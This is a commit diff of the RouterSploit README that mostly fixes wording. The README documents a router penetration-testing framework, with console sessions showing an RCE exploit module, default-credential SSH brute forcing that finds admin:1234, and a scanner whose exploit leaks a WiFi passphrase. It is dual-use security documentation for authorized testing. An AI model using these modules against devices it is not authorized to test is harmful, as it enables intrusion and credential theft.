Skip to content

R
routersploit
Commit 56067d93 by lucyoa
Options

Merge branch 'master' of https://github.com/reverse-shell/routersploit

parents a663c017 35e7cffe
Showing with 29 additions and 30 deletions
README.md
......@@ -12,7 +12,7 @@ It consists of various modules that aids penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if target is vulnerable to any exploit
- scanners - modules that check if a target is vulnerable to any exploit
# Installation
......@@ -29,7 +29,7 @@ It consists of various modules that aids penetration testing operations:
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
## Installation on Ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git
......@@ -55,14 +55,14 @@ It consists of various modules that aids penetration testing operations:
# Update
Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull
# Usage
root@kalidev:~/git/routersploit# ./rsf.py
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
......@@ -76,7 +76,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
Codename : Wildest Dreams
Version : 1.0.0
rsf >
rsf >
## 1. Exploits
......@@ -85,7 +85,7 @@ Update RouterSploit Framework often. Project is under heavy development and new
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
rsf (D-LINK DIR-300 & DIR-600 RCE) >
You can use the tab key for completion.
......@@ -110,7 +110,7 @@ Set options:
### Run module
Exploiting target can be achieved by issuing 'run' or 'exploit' command:
You can exploit the target by issuing the 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
......@@ -152,9 +152,9 @@ Display information about exploit:
### Pick module
Modules located under creds/ directory allow running dictionary attacks against various network services.
Modules located in the `creds/` directory allow running dictionary attacks against various network services.
Following services are currently supported:
The following services are currently supported:
- ftp
- ssh
......@@ -165,8 +165,8 @@ Following services are currently supported:
Every service has been divided into two modules:
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).
- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
Console:
......@@ -174,22 +174,22 @@ Console:
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
### Options
rsf (SSH Default Creds) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IP address
port 22 Target port
Module options:
Name Current settings Description
---- ---------------- -----------
threads 8 Numbers of threads
......@@ -220,21 +220,21 @@ Set target:
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
rsf (SSH Default Creds) >
rsf (SSH Default Creds) >
## 3. Scanners
Scanners allow quickly verify if the target is vulnerable to any exploits.
Scanners allow you to quickly verify if the target is vulnerable to any exploits.
### Pick module
......@@ -245,7 +245,7 @@ Scanners allow quickly verify if the target is vulnerable to any exploits.
### Options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
......@@ -266,11 +266,11 @@ Set target:
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
......@@ -279,7 +279,7 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Parameter Value
--------- -----
get_wps_enable 0
......@@ -292,9 +292,8 @@ It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exp
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
# License
License has been taken from BSD licensing and applied to RouterSploit Framework.
Please see LICENSE for more details.
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment